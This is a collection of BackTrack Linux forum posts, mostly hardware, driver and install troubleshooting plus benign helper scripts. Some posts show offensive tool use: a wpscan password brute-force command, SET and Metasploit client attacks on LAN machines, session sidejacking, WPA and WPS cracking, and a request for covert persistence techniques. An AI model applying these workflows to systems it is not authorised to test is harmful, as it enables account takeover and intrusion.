-
-
I created this script to edit screen brightnes on a macbook.
First you have to install applesmc-dkms:
first add this line:
Code:
deb http://ppa.launchpad.net/poliva/lightum-mba/ubuntu precise main
to your apt sources.list
Code:
nano /etc/apt/sources.list
then install it
Code:
apt-get install applesmc-dkms
now use my script
Code:
#!/bin/bash
# Francesco La Placa (frank10gm@gmail.com)
#
# This program just modifies the value of backlight for Apple Laptops
# You must run it as root user or via sudo.
# As a shortcut you could allow to admin users to run via sudo without password
# prompt. To do this you must add sudoers file the next contents:
#
# Cmnd_Alias CMDS = /usr/local/bin/backlight
# %admin ALL = (ALL) NOPASSWD: CMDS
#
# After this you can use this script as follows:
#
# Increase backlight keyboard:
# $ sudo backlight up
# Decrease backlight keyboard:
# $ sudo backlight down
# Increase to total value backlight keyboard:
# $ sudo backlight total
# Turn off backlight keyboard:
# $ sudo backlight off
#
BACKLIGHT=$(cat /sys/devices/virtual/backlight/apple_backlight/brightness)
MAX=$(cat /sys/devices/virtual/backlight/apple_backlight/max_brightness)
INCREMENT=1
MIN=0
if [ $UID -ne 0 ]; then
echo "Please run this program as superuser"
exit 1
fi
case $1 in
up)
TOTAL=`expr $BACKLIGHT + $INCREMENT`
if [ $TOTAL -eq $MAX ]; then
echo $TOTAL > /sys/devices/virtual/backlight/apple_backlight/brightness
exit 1
fi
if [ $TOTAL -gt $MAX ]; then
let TOTAL=MAX
fi
echo $TOTAL > /sys/devices/virtual/backlight/apple_backlight/brightness
;;
down)
TOTAL=`expr $BACKLIGHT - $INCREMENT`
if [ $TOTAL -eq $MIN ]; then
echo $TOTAL > /sys/devices/virtual/backlight/apple_backlight/brightness
exit 1
fi
if [ $TOTAL -lt $MIN ]; then
let TOTAL=MIN
fi
echo $TOTAL > /sys/devices/virtual/backlight/apple_backlight/brightness
;;
total)
TEMP_VALUE=$BACKLIGHT
while [ $TEMP_VALUE -lt $MAX ]; do
TEMP_VALUE=`expr $TEMP_VALUE + $INCREMENT`
if [ $TEMP_VALUE -gt $MAX ]; then
TEMP_VALUE=$MAX;
fi
echo $TEMP_VALUE > /sys/devices/virtual/backlight/apple_backlight/brightness
done
;;
off)
TEMP_VALUE=$BACKLIGHT
while [ $TEMP_VALUE -gt "0" ]; do
TEMP_VALUE=`expr $TEMP_VALUE - 1`
if [ $TEMP_VALUE -lt "0" ]; then TEMP_VALUE=0; fi
echo $TEMP_VALUE > /sys/devices/virtual/backlight/apple_backlight/brightness
done
;;
*)
echo "Usage: backlight up|down|total|off"
;;
esac
If you want, assign the script to functions keys in system->preferences->keyboard shortcuts (ex: "/script_folder/backlight up" to F5)
-
-
hi
so this is my first post... ok, week ago i just replace wifi card in my laptop, i was Atheros AR 5600 i us that over 4 yare, now i replace because i need good card with 5GHz so i thint that it good choice, but when i install that card, i cant connect to any network, that card is visible in the system but dont work. i have same problem witch ArchLinux, u can read my post on Archlinux
https://bbs.archlinux.org/viewtopic.php?id=154931 maybe that help for sind any solution... so in that case can i ask abut the best card with 5GHz for backtrack, i wanna use for aircrack etc...
Thanks
-
Hello everybody maybe somebody would like to help me with few thinks on backtrack? like:
-wep 128bit
-wpa/wpa2 tkip
and maybe nvidia cuda pyrit i think:)
If somebody have some free time sometimes please send me message we can talk on skype or something another.
i speak en,hr,pl some de
-
Hello im using backtrack 5r3 on wmware for 2months today i would like to install it i made bootable usb i tryed forensic version , default version etc but:
1) sometimes its crashes before i even put startx
2) and sometimes crash after i put startx :(
i have nvidia graphic card what i should do??
p.s i cant write any comands nothing.
-
Posted: January 5th, 2013, 4:40am PST by nexuz
Please continue the Backtrack 5 ARM version ;)
Who is with me post here so they can see how many possible arm users they have !
-
I have hp dv6-6c65sx specs
Microprocessor 2.2 GHz Intel Core i7-2670QM
RAM 8 GB DDR3
Video Graphics AMD Radeon HD 7690M XT (2 GB DDR5 dedicated)
now when i install bt5r3 i have no problem at all starts really well and every thing but the vga card driver is BT5R3 default and doesn't give me the normal resolution for the screen and i wana run pyrit using gbu so i need the correct driver for the amd radeon hd 7690M XT
so every time i try to install the install goes fine but when i restart it gives me back screen after the startx i tried every thing there is installed every ver. from amd catalyst drivers tried every thing and read that the 7690 card doesnt have driver from amd for linux and i could use other driver for other card with same chipset so i did same problem always blackscreen after startx every time i install amd driver can any 1 help me with this issue ?!!!
thx in advance
-
-
Posted: January 4th, 2013, 10:03pm PST by kasko
Hi all,
some weeks ago i found an old Netgear WG111v2 with RTL8187L and, running BT5 with Parallels, i did some test with aircrack ecc.
After few minutes the connection goes down and i remembered what was the problem, the disconnections that makes the adapter useless.
After some research on Google i didn't find a real solution.
This problems sounds like a overheating problem (fixable) or some buffer problem (hope that netgear's eng. not so stupid :D).
So finally i fixed it in this way (luckly was an overheating problem!):
https://fbcdn-sphotos-f-a.akamaihd.n...94129034_n.jpg
Now this adapter works up to 48h and the sink is really hot, but all work great.
Hope this is usefull for all of you that have this adapters that works great with BT (now!) :)
Bye
Carlo
-
Some scripts I wrote to start, update and stop openvas.
Not much they do just what they say they do. Saves you a few keystrokes.
Enjoy -Reaperz
First the start and update script
Code:
#!/bin/bash
# Bash script to start openvas and greenbone services.
# startopenvas.sh v0.1 by r3@p3rz
# tested in backtrack 5R1 environment, run as root.
# written just to save some steps.
# could have been done in 6 lines , but this was more fun
# style variables
execstyle="[\e[01;32mx\e[00m]" # execute msgs style
warnstyle="[\e[01;31m!\e[00m]" # warning msgs stylee
infostyle="[\e[01;34mi\e[00m]" # informational msgs style
#fun little banner
clear
echo -e "\e[01;32m
_______ _______ _______ _ _______ _______
( ___ )( ____ )( ____ \( ( /||\ /|( ___ )( ____ \
| ( ) || ( )|| ( \/| \ ( || ) ( || ( ) || ( \/
| | | || (____)|| (__ | \ | || | | || (___) || (_____
| | | || _____)| __) | (\ \) |( ( ) )| ___ |(_____ )
| | | || ( | ( | | \ | \ \_/ / | ( ) | ) |
| (___) || ) | (____/\| ) \ | \ / | ) ( |/\____) |
(_______)|/ (_______/|/ )_) \_/ |/ \|\_______)
\e[0m"
echo -e "\e[1;1m..----=====*****(( Startup Script ))*******=====----..\e[0m"
echo -e "\e[31m *************************************************************\e[0m"
echo -e "\e[31m * *\e[0m"
echo -e "\e[31m * \e[1;37mStarting All OpenVas Services \e[0;31m*\e[0m"
echo -e "\e[31m * *\e[0m"
echo -e "\e[31m *************************************************************\e[0m"
echo
echo -e "\e[31mKilling all Openvas for fresh start.\e[0m"
#kill openvas scanner
echo -e "$execstyle Checking OpenVas Scanner is running..."
ps -ef | grep -v grep | grep openvassd
if [ $? -eq 1 ]
then
echo -e "$warnstyle OpenVas Scanner not running!"
else
echo -e "$execstyle Stopping OpenVas Scanner..."
killall openvassd
fi
#kill openvas administrator
echo -e "$execstyle Checking if OpenVas Administrator is running..."
ps -ef | grep -v grep | grep openvasad
if [ $? -eq 1 ]
then
echo -e "$warnstyle OpenVas Administrator not running!"
else
echo -e "$execstyle Stopping OpenVas Administrator..."
killall openvasad
fi
#kill openvas manager
echo -e "$execstyle Checking if OpenVas Manager is running..."
ps -ef | grep -v grep | grep openvasmd
if [ $? -eq 1 ]
then
echo -e "$warnstyle OpenVas Manager not running!"
else
echo -e "$execstyle Stopping OpenVas Manager..."
killall openvasmd
fi
#kill Greenbone Security Assistant
echo -e "$execstyle Checking if Greenbone Security Assistant is running..."
ps -ef | grep -v grep | grep gsad
if [ $? -eq 1 ]
then
echo -e "$warnstyle Greenbone Security Assistant not running!"
else
echo -e "$execstyle Stopping Greenbone Security Assistant..."
killall gsad
fi
#### all done! now start services
echo
echo -e "33[31mAll Done!! :33[m
Now starting OpenVas services..."
echo -e "33[31mSyncing updates.......33[m
This may take a while!!!!"
openvas-nvt-sync
echo ok!
echo -e "\e[31mStarting OpenVas Scanner.\e[0m"
openvassd
echo ok!
echo -e "33[31mRebuilding database......33[m
This may take a while!!!!"
openvasmd --rebuild
echo ok!
echo -e "\e[31mStarting OpenVas Manager.\e[0m"
openvasmd -p 9390 -a 127.0.0.1
echo ok!
echo -e "\e[31mStarting OpenVas Administrator.\e[0m"
openvasad -a 127.0.0.1 -p 9393
echo ok!
echo -e "\e[31mStarting Greenbone Security Assistant.\e[0m"
gsad --http-only --listen=127.0.0.1 -p 9392
echo ok! All should be good!
#is it up openvas scanner
echo -e "$execstyle Checking if OpenVas Scanner is running..."
ps -ef | grep -v grep | grep openvassd
if [ $? -eq 1 ]
then
echo -e "$warnstyle OpenVas Scanner not running!"
else
echo -e "$infostyle OpenVas Scanner is running!!"
fi
#is it up openvas administrator
echo -e "$execstyle Checking if OpenVas Administrator is running..."
ps -ef | grep -v grep | grep openvasad
if [ $? -eq 1 ]
then
echo -e "$warnstyle OpenVas Administrator not running!"
else
echo -e "$infostyle OpenVas Administrator is running!!"
fi
#is it up openvas manager
echo -e "$execstyle Checking if OpenVas Manager is running..."
ps -ef | grep -v grep | grep openvasmd
if [ $? -eq 1 ]
then
echo -e "$warnstyle OpenVas Manager not running!"
else
echo -e "$infostyle OpenVas Manager is running!!"
fi
#is it up Greenbone Security Assistant
echo -e "$execstyle Checking if Greenbone Security Assistant is running..."
ps -ef | grep -v grep | grep gsad
if [ $? -eq 1 ]
then
echo -e "$warnstyle Greenbone Security Assistant not running!"
else
echo -e "$infostyle Greenbone Security Assistant is running"
fi
#### all done!
echo
echo -e "33[01;32mOK!!33[m"
echo -e "33[31mAll Done!! :)33[m
OpenVas is running!! Open browser to 127.0.0.1:9392 or open Green Bone Security Desktop.
You can close this window now!"
Now the stop and clean script
Code:
#!/bin/bash
# Bash script to stop openvas and greenbone services.
# stopopenvas.sh v0.1 by r3@p3rz
# tested in backtrack 5R1 environment, run as root.
# written just to save some steps.
# could have been done in a single line
# -ie. echo ; killall openvassd ; killall openvasad ; killall openvasmd ; killall gsad
# but this was more fun
# style variables
execstyle="[\e[01;32mx\e[00m]" # execute msgs style
warnstyle="[\e[01;31m!\e[00m]" # warning msgs style
infostyle="[\e[01;34mi\e[00m]" # informational msgs style
#fun little banner
clear
echo -e "\e[01;32m
_______ _______ _______ _ _______ _______
( ___ )( ____ )( ____ \( ( /||\ /|( ___ )( ____ \
| ( ) || ( )|| ( \/| \ ( || ) ( || ( ) || ( \/
| | | || (____)|| (__ | \ | || | | || (___) || (_____
| | | || _____)| __) | (\ \) |( ( ) )| ___ |(_____ )
| | | || ( | ( | | \ | \ \_/ / | ( ) | ) |
| (___) || ) | (____/\| ) \ | \ / | ) ( |/\____) |
(_______)|/ (_______/|/ )_) \_/ |/ \|\_______)
\e[0m"
echo -e "\e[1;1m..----=====*****(( Shutdown Script ))*******=====----..\e[0m"
echo -e "\e[31m *************************************************************\e[0m"
echo -e "\e[31m * *\e[0m"
echo -e "\e[31m * \e[1;37mStopping All OpenVas Services \e[0;31m*\e[0m"
echo -e "\e[31m * *\e[0m"
echo -e "\e[31m *************************************************************\e[0m"
#kill openvas scanner
echo -e "$execstyle Checking OpenVas Scanner is running..."
ps -ef | grep -v grep | grep openvassd
if [ $? -eq 1 ]
then
echo -e "$warnstyle OpenVas Scanner not running!"
else
echo -e "$execstyle Stopping OpenVas Scanner..."
killall openvassd
echo -e "$infostyle OpenVas Scanner is dead!!"
fi
#kill openvas administrator
echo -e "$execstyle Checking if OpenVas Administrator is running..."
ps -ef | grep -v grep | grep openvasad
if [ $? -eq 1 ]
then
echo -e "$warnstyle OpenVas Administrator not running!"
else
echo -e "$execstyle Stopping OpenVas Administrator..."
killall openvasad
echo -e "$infostyle OpenVas Administrator is dead!!"
fi
#kill openvas manager
echo -e "$execstyle Checking if OpenVas Manager is running..."
ps -ef | grep -v grep | grep openvasmd
if [ $? -eq 1 ]
then
echo -e "$warnstyle OpenVas Manager not running!"
else
echo -e "$execstyle Stopping OpenVas Manager..."
killall openvasmd
echo -e "$infostyle OpenVas Manager is dead!!"
fi
#kill Greenbone Security Assistant
echo -e "$execstyle Checking if Greenbone Security Assistant is running..."
ps -ef | grep -v grep | grep gsad
if [ $? -eq 1 ]
then
echo -e "$warnstyle Greenbone Security Assistant not running!"
else
echo -e "$execstyle Stopping Greenbone Security Assistant..."
killall gsad
echo -e "$infostyle Greenbone Security Assistant is dead!!"
fi
#### all done!
echo
echo -e "33[01;32m All Done!! :)33[m
You can close this window now..."
-
Backtrack 5 R3 KDE 32bit, installed on multi boot laptop with win7, Ubuntu 10.10 and Backtrack 5 R3. I am using the implementation of grub built in to Ubuntu 10.10 to boot all three operating systems. The hardware is an Acer aspire 4250. The hang occures during Backtrack startup. I select bactrack from the grub minu, it boots, I see the splash screen ( the more you hear etc), then screen goes back to scrolling text until login appears. At this point, if I let the system sit for about 15 seconds it hangs. If I try to log in, it hangs. If I connect the laptop to the internet with a cat5 in the RJ45 socket, or if I just plug the system into an unused Cisco switch, Backtrak boots and runs normally. I think the problem is connected to the wired network drivers. Does anyone have a clue?
BTW BT 5 R3 is the only OS that manifests this behavior. My enchant Ubuntu distro and my game boot loader (microsoft windows) both boot and run without a problem.
Network hardware info:
*-network
description: Ethernet interface
product: AR8152 v2.0 Fast Ethernet
vendor: Atheros Communications
physical id: 0
bus info: pci@0000:02:00.0
logical name: eth0
version: c1
serial: e8:9a:8f:31:0d:fb
capacity: 100MB/s
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation
configuration: autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.0.2-NAPI firmware=N/A latency=0 link=no multicast=yes port=twisted pair
resources: irq:42 memory:f0200000-f023ffff ioport:2000(size=128)
-
im trying to install wifi honey on backtrack5r1 32bit
i get this message
root@bt:~# apt-get install wifi_honey
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Couldn't find package wifi_honey
root@bt:~# sudo apt-get install wifi_honey
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Couldn't find package wifi_honey
-
Hello, I'm new to the forum, so excuse my "Newness"
I have a Acer Aspire One netbook that's a little over a year and half old.
I replaced it 6 months ago by building a rig, so the netbook isn't doing anything.
It's slow, and laggy, but I was wondering if I DBAN it, would it be able to run backtrack 5 as its main OS?
I know its not designed for that, so what would be the problems?
I realize this question might make no sense, like I said, I'm new to this.
Thanks. :D
-
BackTrack 5 R3 is set up on a virtual machine.
Apache started.
I also downloaded SET(social-engineer toolkit).
First of all, I deactivated all av in the machines in my LAN to perform the test. All of them are running on Windows 7.
1)I launched the first pen-test with the autopwn exploit. It didn't work at all.
2)I set up on SET an attack based on Java. It didn't work at all.
3)I set up a java signed applet on msfconsole. It didn't work at all.
1. it keeps sending data to the victim repeatedly. No shell is returned.
2. It shows up java dialog box repeatedly. I(as victim) click on accept and run. And again it shows up java dialog box. I click on accept and run and the same thing happens again. No shell is returned to my BackTrack on virtual machine.
3. When it doesn't show up java dialog box many times even when I(as victim) click on run, msfconsole on my BackTrack on virtual machine keeps waiting for the user to click on run on java dialog box forever and never returns a shell.
Sorry for my english.
Thanks
-
Hello community,
I'm (almost) ready to throw my laptop off a really tall building, because I'm that pissed off and can't seem to find my way around to solve this problem.. And it's a good laptop, with i7 top notch processor, so that just goes to show how hopeless I am.. :/
Okay, joking aside I really need your help! I think I've spent last 2 days installing/uninstalling BT5r3 numerious times and tried many different ways around installing nvidia drivers but none seemed to work..
This is the case: I have Dell laptop N5110 with GeForce 525M graphics card. It's optimus tehnology, meaning I have 2 graphics card, Inter HD and GeForce, and it should change them depending on what I'm doing on laptop..
I did a clean install of BT5r3-64x off USB pen installation, and did the following:
1. typed: prepare-kernel-source
2. typed: cd /usr/src/linux
3. typed: cp -rf include/generated/* include/linux/
4. downloaded (either 310.19 or 304.64, can't really remember, 64x edition) driver from
www.nvidia.com/object/unix.html
5. typed: chmod -x /path-to-downloaded-run-file
then I went on to disable nouveau kernel
1. opened grub.cfg with gedit /boot/grub/grub.cfg
2. searched for vga=791 and appended "nouveau.modeset=0"
Then I rebooted..
Next, after I've logged in, without typing "Startx" I did the following:
1. cd /path-to-driver
2. ./driver-name.run --kernel-source-path='/usr/src/linux'
3. then the installation did its own thing
4. then i updated the grub with command update-grub
and then I rebooted again..
When I tried to wrote startx, I was greeted with this:
baaga.jpg
And I have also included the Xorg.0.log file in attachments..
Immagini allegate
File allegati
-
Hello All,
I have Oracle VirtualBox installed on my Windows 7 .. I installed Linux Backtrack 5 on it.
I gave it 1GB RAM and 20GB HDD ... Now I have a problem, I used ferret and hamster for sidejacking ( I use it for testing ) ..
When I run it, I'm able to sniff the traffic from the VirtualBox .. but nothing else. Sometimes ( rarely ) I can sniff traffic from the host ( Windows 7 PC ). I'm not sure what am I doing wrong here.
NOTE: I use an external Wireless Card that is compatible with backtrack.
-
-
Hello everyone :)
I am new hearand I got an question - why there isn't a pinned organized topic with all the greatest video tutorials in the video tutorial section ?
And other main topics in the other sections ...
This will reduce the searching in the forum and will improve the Convenience level here.
-
Hi, BT has brought me a lot of damage!
I installed the Live CD setup of BT5 R3 on a USB drive. Now my desktop and laptop both have Full drive encryption with TrueCrypt (on their main hard disks).
After i've run the Live setup from the thumbdrive on both my desktop and laptop. I remove the thumbdrive, and boot from my regular hard disk. It now says that my TrueCrypt password isn't correct!! Bullshit!!
I had a ton of super imporant data on those drives. You must be kidding me!! Now I'm really pissed off at backtrack, and it will be months of work to retreive back all the lost files!! :(
How can it be possible that a Live Distro corrupts drives without asking ????
The TrueCrypt recovery cd isn't working, it still says, password incorrect! The partitions are all there. It's just that somehow the password isn't working anymore :(
Is this for real, did i really lose all that data.
Sorry but i am terribly upset! This is very bad news!
-
I have been trying to split a 10GB wordlist into 2GB pieces using the command split, the problem is that before the first part is completed the program tells me memory full so I checked the place called root and its only 1.8 GB in size which is obviously not enough the question is how do i change where the files are placed
P.S I boot backtrack from a memory stick,I have a 500GB hard disk and 4GB ram
Another P.S i have tried to see where that root is but i have failed to find out as its not on the hard drive nor on the memory stick and i doubt that its on the ram
thanks in advance
-
hi i have a backtrack 5 r3 running on vmware fusion. im using a alfa usb modem. and after connect to the wifi between 60 sec and 2minute the connection goes and it always says network down. it successfuly connects but always loses connection. can someine help me. thanks
-
-
in your opinion which is better for a novice user , which will be more user friendly for running BT5r3
thnx =)
just a little bit about myself i found out about BT5 after becoming interested in internet security , i wan to find way to keep myself and my machine safe from harm. I am not a professional but i would like to learn as much as i can and maybe even contribute something worthwhile one day.
also if you know any good forums pertaining to internet security that would also be helpful
thnx in advice
^_^
-
I've been having an incredible difficult time trying to get BT5 to work on my asus tf700. My tablet is rooted and unlocked running stock JB 4.1.1. So far I've tried following the tutorials online (install image, install busybox, extract image, boot in terminal emulater, etc...) however every time I type in sh bootbt i get one of two errors.
the first one basically says that the loop device failed, I know what that means and if thats the only problem does anyone know where I can find a loop device enabled tf700 kernel?
the second error I get is
": cannot be found
syntax error[13] if unmatched"
this one I have no idea what it means so any advice would be awesome.
this is my first time posting to this forum so sorry in advance for any annoying newbie traits that I have...
I really want to be able to run BT5 on my tablet and I know it can be done but after a week of non stop google/forum searching I can't find the answer so I'm turning it over to those more intelligent then I, thanks for the help
-
I am trying to pentest my WPS vulnerable wireless lan using BT5 r3 / Reaver running in VirtualBox 4.2.6 r82870 with a USB wireless dongle
Opening Wicd Network Manager in BT the dongle flashes away happily and I can see my network with good signal strength (90%).
Typing:
Code:
iwconfig
I get:
Code:
lo no wireless extensions.
wlan0 IEEE 802.11bgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
eth0 no wireless extensions.
It's in managed mode so I issue the following to get it into monitor mode:
Code:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig wlan0
Outputs:
Code:
wlan0 IEEE 802.11bgn Mode:Monitor Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Power Management:on
Issuing command :
Code:
airmon-ng start wlan0
Outputs:
Code:
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
571 dhclient3
1760 dhclient3
Process with PID 1760 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy1]
(monitor mode enabled on mon0)
I kill the above processes (although tried also without killing them):
Code:
killall -9 dhclient
The problem I am experiencing occurs with:
Code:
airodump-ng wlan0
No networks show up even though I know they are there when confirmed previously with Wicd Manager before issuing above commands. The dongle does not show any light activity at this point and going into Wicd shows "No wireless networks found".
It's as if the dongle has stopped working all of a sudden.
I never had the problem when running BT from the live CD and was able to get a list of Wireless networks in airodump-ng without problem.
What am I doing wrong?
-
-
Hello.
Backtrack 5 R3
I am having difficulty getting a dhcp3-server to allocate out addresses when I go beyond wlan1, using hostapd. I need dhcp3-server to allocate addresses via the atheros sub wifi adapter.
In fact, my logs in syslog are showing:
No subnet declaration for wlan 1 (0.0.0.0) bla bla bla
when I don't even have a card in the slot for wlan1, but do have an atheros usb wifi adapter attached in the usb port and that is coming up as wlan2 under ifconfig.
However, when I have ONLY a wifi card slipped into the slot it shows up as wlan1 under ifconfig, dhcp3-server allocates successfully ip addresses to clients connecting to wlan1.
I'm wondering if this can be a problem with drivers?
Additionally I'm seeing in the syslog:
udev: renamed network interface wlan1 to wlan2
which doesn't help things.
contents of /etc/network/interfaces:
auto lo
iface lo inet loopback
auto eth0
iface etho inet dhcp
auto wlan0
iface wlan0 inet dhcp
auto wlan1
iface wlan1 inet dhcp
auto wlan2
iface wlan2 inet dhcp
contents of /etc/dhcp3/dhcpd.conf:
ddns-update-style none;
ignore client-updates;
authoritative;
option local-wpad code 252 = text;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option domain-name-servers 10.0.0.1, 8.8.8.8, 8.8.4.4;
option time-offset 0;
range 10.0.0.3 10.0.0.13;
default-lease-time 1209600;
max-lease-time 1814400;
}
Any help much appreciated.
-
Hello everyone i recently start using the BackTrack linux and as you can assume i still meet some problems and difficulties with some of the tools included in the distribution. So my problem is that i'm trying to brute force a Wordpress site but the brute forcer seems to be frozen, it's staying on 0% for more than an hour, so the commands i used are as follow
Code:
root@bt:/pentest/web/wpscan# ruby wpscan.rb --url http://locahost/wp--wordlist darkc0de.lst --username admin
NOTE: I have the darkc0de.lst copied to the /pentest/web/wpscan directory
So looks like the brute forcer is starting without problems but its staying like this for a long period
Code:
[+] Starting the password brute forcer
Brute forcing user 'admin' with 1707657 passwords... 0%
Everything else is working just fine but that's the problem i can't figure. I was looking for a similar threads but i couldn't find anything useful
-
-
Ppl, one question.
Why i not see the mptcp tool on latest version of BackTrack release? It there isn't part of system ?
I use the MpTcp like my favorite ARP intrusion tool and web stress test, but i cannot run under backtrack.
Mptcp doc:
http://www.hexcodes.org/mptcp.i
Mptcp hard intrusion documentation:
www.hexcodes.org/tools/mptcp/mptcp.txt
Thanks, and good new year.
-
Hi guys. I have BT5 r3 and I had Ettercap 0.7.4 in it which is default.
Problem is after host scanning in ettercap -G.It shuts down EVERYTIME.
I searched internet for some more info and found 0.7.5 should help.
So purge removed ettercap and tried to apt-get a newer version.
It installed me 0.7.3 so I found a link
HTML Code:
http://sourceforge.net/projects/ettercap/files/ettercap/0.7.5-Assimilation/ettercap-0.7.5.tar.gz/download
Untar the file and start install via README which is
The easiest way to compile ettercap is in the form:
mkdir build
cd build
cmake ..
(Use ccmake . to change options such as disabling IPv6 support, add
plugins support, etc).
make install
I stuck at cmake..
Code:
root@bt:~/Downloads/ettercap-0.7.5/build# cmake ..
-- The C compiler identification is GNU
-- Check for working C compiler: /usr/bin/gcc
-- Check for working C compiler: /usr/bin/gcc -- works
-- Detecting C compiler ABI info
-- Detecting C compiler ABI info - done
-- Check if the system is big endian
-- Searching 16 bit integer
-- Looking for sys/types.h
-- Looking for sys/types.h - found
-- Looking for stdint.h
-- Looking for stdint.h - found
-- Looking for stddef.h
-- Looking for stddef.h - found
-- Check size of unsigned short
-- Check size of unsigned short - done
-- Using unsigned short
-- Check if the system is big endian - little endian
-- Looking for sys/poll.h
-- Looking for sys/poll.h - found
-- Looking for sys/select.h
-- Looking for sys/select.h - found
-- Looking for sys/utsname.h
-- Looking for sys/utsname.h - found
-- Looking for getopt.h
-- Looking for getopt.h - found
-- Looking for ctype.h
-- Looking for ctype.h - found
-- Looking for arpa/nameser.h
-- Looking for arpa/nameser.h - found
-- Looking for ltdl.h
-- Looking for ltdl.h - found
-- Looking for dlfcn.h
-- Looking for dlfcn.h - found
-- Looking for wsyncup in /usr/lib/libcurses.so
-- Looking for wsyncup in /usr/lib/libcurses.so - found
-- Found Curses: /usr/lib/libcurses.so
CMake Error at /usr/share/cmake-2.8/Modules/FindGTK2.cmake:370 (message):
Could not find GTK2 include directory
Call Stack (most recent call first):
CMakeFiles/lib_check.cmake:33 (find_package)
CMakeLists.txt:28 (include)
-- Configuring incomplete, errors occurred!
If I try make or make install
Code:
root@bt:~/Downloads/ettercap-0.7.5/build# make install
make: *** No rule to make target `install'. Stop.
Thanks for any help and happy new year.
PS:Sorry for my english
-
I am runing the latest version of backtrack and gnome 32bit, When i get into the bios menu I have selected the appropriate settings and it then shows me a menu with a couple options:
I am using a LiveCD using unetbootin, I used mac unetbootin to mount the iso onto my usb (does that matter?)
UNetbootin then has this gui:
Default
Start Linux Mint
Start in compatibility mode
Integrity check
Memory test
Boot from local drive
I am very confused as I have downloaded the backtrack iso, why is it giving me linux mint?
-
-
I'm having an issue with serious system lag on backtrack also its using a constant 50% CPU. I had to reinstall and that's when the problem started worked fine with same settings and every thing. Any one know any fix or possible reason why it could have started lagging? And help would be appreciated
-
Hi everyone,
I've been reading a ton of resources on a lot of different aspects to pen testing and security; Exploits, Metasploit, Web App Security, Injection Vulnerabilities, Networking etc etc. I've found it all fascinating and I'm keen to learn a heap more. One area I've found unfortunately a little lacking is post exploitation. I'm really interested in common techniques found in establishing back doors, rootkits, how to detect them on your system, escalating a windows command shell into something more effective and permanent, etc.
My question is - what do you think are great resources on post exploitation? Are there any good books that focus comprehensively on this area? I've tried googling and also searching for forums here for "post exploit" and "post" just browsing through the pages, but I haven't found anything comprehensive unfortunately.
Again, found some brief mentions / sections in books, but was hoping for something more comprehensive (if it exists).
As an example, given only a default windows XP command shell with no additional programs, how would you establish a permanent connection without user interaction? I could only think of perhaps launching iexplore from the command shell to an infected browser perhaps, but I'd love to learn more.
Thanks all.
-
I am having problems with metasploit. When I try to remove it with either apt or synaptic, I get an error. I also cannot update the rest of backtrack because it gives an error. Not sure how to proceed. Here is what the error stuff says:
Code:
E: /var/cache/apt/archives/metasploit_4.4.0-bt2_i386.deb: subprocess new pre-removal script returned error exit status 127
Code:
root@bt:~# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
2 not fully installed or removed.
After this operation, 0B of additional disk space will be used.
Do you want to continue [Y/n]? y
Setting up framework (4.0.0-bt1) ...
chmod: cannot access `framework-32.run': No such file or directory
/var/lib/dpkg/info/framework.postinst: line 11: ./framework-32.run: No such file or directory
Building native extensions. This could take a while...
Successfully installed mysql-2.9.0
1 gem installed
Installing ri documentation for mysql-2.9.0...
Installing RDoc documentation for mysql-2.9.0...
ln: creating symbolic link `/pentest/exploits/framework': File exists
dpkg: error processing framework (--configure):
subprocess installed post-installation script returned error exit status 1
dpkg: dependency problems prevent configuration of framework3:
framework3 depends on framework; however:
Package framework is not configured yet.
dpkg: error processing framework3 (--configure):
dependency problems - leaving unconfigured
No apport report written because the error message indicates its a followup error from a previous failure.
Errors were encountered while processing:
framework
framework3
E: Sub-process /usr/bin/dpkg returned an error code (1)
Thanks,
JP
-
as from the title i have bt5's oldest release available and a netgear n150 usb adapter (wna1100). my problem is that i cant even get bt to allow me to use it to surf the web, tho it does list the device with lsusb. ifconfig and ifconfig -a do not make note of my usb or wlan0, if i try to turn said device on with the ifwlan0up (or similar command) i get the error message that the device does not exist. i have made changes to the /etc/modules file under wlan0 to include the ath9l_htc driver.
-
Hey
I have been playing around with some WPA testing,
but it is taking alot of time, so I want to see if I can speed it abit up.
What's best for cracking passwords?
A nVida Graphic card - Pyrit CUDA
or a ATI - Pyrit Opencl or cal++
Thanks
-
-
HP Compaq 6715b laptop with dual boot win7 and Backtrack 5r3,
I have been all over the wiki and other posts trying to get these installed but have no idea what I am doing wrong. I have the package:
jre-7u10-linux-i586.rpm
and
flash-plugin-11.2.202.258-release.x86_64.rpm
both sitting on my desktop, I would like to get some help configuring/installing these so Firefox can use them, can anyone help. I am very new to command line, very limited in ability but I want to learn, I have tried so many different things I think I screwed up any dir these might need to go into. I have no idea where to go from here. I also have the:
jre-7u10-linux-i586.tar.gz
Sitting on my desktop. Can anyone help me?
-
Okay so I've successfully had backtrack running in a virtual environment, but I've recently received an old asus eepc and thought it would be perfect to get a full install on it....IF ONLY!!
I'm now at a complete loss for how to install this. I'm booting off of a usb cd rom drive because the laptop doesn't come with a built in cd tray. So the problem occurs when I click forward after selecting my keyboard input in the installer...the computer just suddenly boots to windows! I have no freakin idea why that happens. So in my frustration I completely wiped windows off the HDD and formatted the drives. Now when I hit forward after selecting my keyboard input the computer just restarts?! wtf! all of the guides just show the installer going smoothly from step 3(the keyboard input) to step 4(format the partitions etc)... help!!!!
So here is the steps I go through!
1.download backtrack 5 r3 gnome-32bit image
2.burn to dvd
3.boot to usb (which is the cd usb cdrom)
4.Press enter at Boot:
5.select option 1 - default boot text mode
6.type startx to enter gui
7.double click install backtrack
8.select my language
9.select my time zone
10.select my keyboard input
11.hit forward after keyboard input and computer reboots....
12.bang head on desk repeatedly
